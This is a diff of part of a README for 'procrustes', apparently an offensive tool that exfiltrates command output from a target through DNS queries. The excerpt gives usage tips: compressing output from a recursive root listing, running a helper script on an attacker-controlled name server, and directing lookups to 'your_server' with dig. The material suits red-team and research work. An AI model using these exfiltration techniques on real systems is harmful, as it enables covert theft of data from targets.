vp777/procrustes/Readme.md

  - In case long text output is expected, you can try compressing it first to speed up the exfil process, e.g. ./procrustes_full.sh ... -o >(gzip -d) -- 'ls -lhR / | gzip'
  - Another possibility for big/binary files is to copy them to a path which is accessible for example through HTTP
  - For increased exfil bandwidth, run the staged_files/dnsns.py on your name server.
 That way, we avoid waiting for the underlying DNS_TRIGGER to timeout before moving on to a new chunk.
 This is especially usefull in the case of procroustes_full/powershell where we currently have no parallelization.
  - Ideally, you would have a domain (-h option) with an NS record pointing to a server you control (server where we run tcpdump).
-Nevertheless, in case the target is allowed to initiate connections to arbitrary DNS servers, this can be avoided by having the DNS trigger exclicitly using your DNS server (e.g. dig @your_server whatev.er)
+Nevertheless, in case the target is allowed to initiate connections to arbitrary DNS servers, this can be avoided by having the DNS trigger explicitly set to use our DNS server (e.g. dig @your_server whatev.er)

 ### Todos
  - Create a wrapper script, that will contain variables (e.g. host=a, dns_trigger=b, dispatcher=c ...) and will translate them to procrustes commands (e.g. ./procrustes_full.sh -h a -d b -x c -- "$1")